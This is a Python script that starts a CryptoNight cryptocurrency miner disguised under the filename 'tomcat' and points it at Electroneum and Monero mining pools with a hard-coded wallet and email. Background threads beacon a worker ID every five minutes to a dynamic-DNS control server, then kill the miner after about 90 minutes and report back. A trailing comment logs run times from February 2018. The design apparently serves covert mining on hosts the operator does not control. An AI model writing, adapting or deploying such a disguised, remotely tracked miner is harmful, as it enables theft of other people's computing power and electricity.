import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:32:03.579770
#2018-02-17 16:18:03.804926
#2018-02-17 18:06:01.991121
#2018-02-17 19:52:06.234880
#2018-02-17 21:39:07.072936
#2018-02-17 23:23:03.579018
#2018-02-18 01:12:01.678940
#2018-02-18 02:59:01.545166
#2018-02-18 04:48:07.842970
#2018-02-18 06:39:05.876780
#2018-02-18 08:28:05.318506
#2018-02-18 10:15:06.562236
#2018-02-18 12:01:01.851395
#2018-02-18 13:46:06.800025
#2018-02-18 15:38:01.975717
#2018-02-18 17:27:01.489797
#2018-02-18 19:14:06.315041
#2018-02-18 21:01:05.325512
#2018-02-18 22:47:05.966573
#2018-02-19 00:37:03.895015
#2018-02-19 02:23:05.888075
#2018-02-19 04:10:06.158751
#2018-02-19 05:54:05.808251
#2018-02-19 07:44:02.020194
#2018-02-19 09:33:08.137563
#2018-02-19 11:23:04.303082
#2018-02-19 13:10:12.271745
#2018-02-19 14:59:06.851148
#2018-02-19 16:48:11.333869
#2018-02-19 18:34:06.049664
#2018-02-19 20:19:07.643750
#2018-02-19 22:08:06.280142
#2018-02-19 23:54:01.634257
#2018-02-20 01:40:08.823589
#2018-02-20 03:28:08.003777
#2018-02-20 05:15:06.915314
#2018-02-20 06:59:07.617104
#2018-02-20 08:46:04.107946
#2018-02-20 10:30:03.635132
#2018-02-20 12:15:11.755585
#2018-02-20 14:04:01.348967
#2018-02-20 15:47:09.793388
#2018-02-20 17:34:02.029961
#2018-02-20 19:21:01.631715
#2018-02-20 21:10:03.681464
#2018-02-20 22:56:06.161689
#2018-02-21 00:41:01.784480
#2018-02-21 02:26:07.883560
#2018-02-21 04:12:08.633716
#2018-02-21 05:59:05.035756
#2018-02-21 07:48:10.329015
#2018-02-21 09:28:07.761026
#2018-02-21 11:17:10.029149
#2018-02-21 13:04:04.697998
#2018-02-21 14:51:07.004137
#2018-02-21 16:38:08.064706
#2018-02-21 18:27:07.553116
#2018-02-21 20:12:08.236373
#2018-02-21 22:01:06.492815
#2018-02-21 23:48:07.344490
#2018-02-22 01:39:02.166475
#2018-02-22 03:27:01.736239
#2018-02-22 05:14:07.706096
#2018-02-22 06:59:06.455974
#2018-02-22 08:47:08.239522
#2018-02-22 10:35:07.709594
#2018-02-22 12:20:01.467272
#2018-02-22 14:06:05.874205
#2018-02-22 15:52:06.199012
#2018-02-22 17:39:04.735108
#2018-02-22 19:25:03.174570
#2018-02-22 21:17:02.011288
#2018-02-22 23:02:02.105439
#2018-02-23 00:49:06.955115
#2018-02-23 02:37:06.759361
#2018-02-23 04:25:01.843770
#2018-02-23 06:11:01.868209
#2018-02-23 07:56:01.170413
#2018-02-23 10:10:09.963264
#2018-02-23 12:03:08.383522
#2018-02-23 13:50:08.692944
#2018-02-23 15:39:09.791783
#2018-02-23 17:26:10.696509
#2018-02-23 19:12:04.351326
#2018-02-23 20:56:02.051712
#2018-02-23 22:43:02.144176
#2018-02-24 00:30:05.289543
#2018-02-24 02:21:03.956041
#2018-02-24 04:12:04.239759
#2018-02-24 06:00:05.446803
#2018-02-24 07:47:06.344829
#2018-02-24 09:29:03.653183
#2018-02-24 11:22:04.275294
#2018-02-24 13:11:08.027443
#2018-02-24 15:02:03.670546
#2018-02-24 16:52:05.337366
#2018-02-24 18:40:08.410736
#2018-02-24 20:31:05.146624
#2018-02-24 22:29:06.489710
#2018-02-25 01:39:06.554971
#2018-02-25 05:17:07.120561
#2018-02-25 11:22:01.727809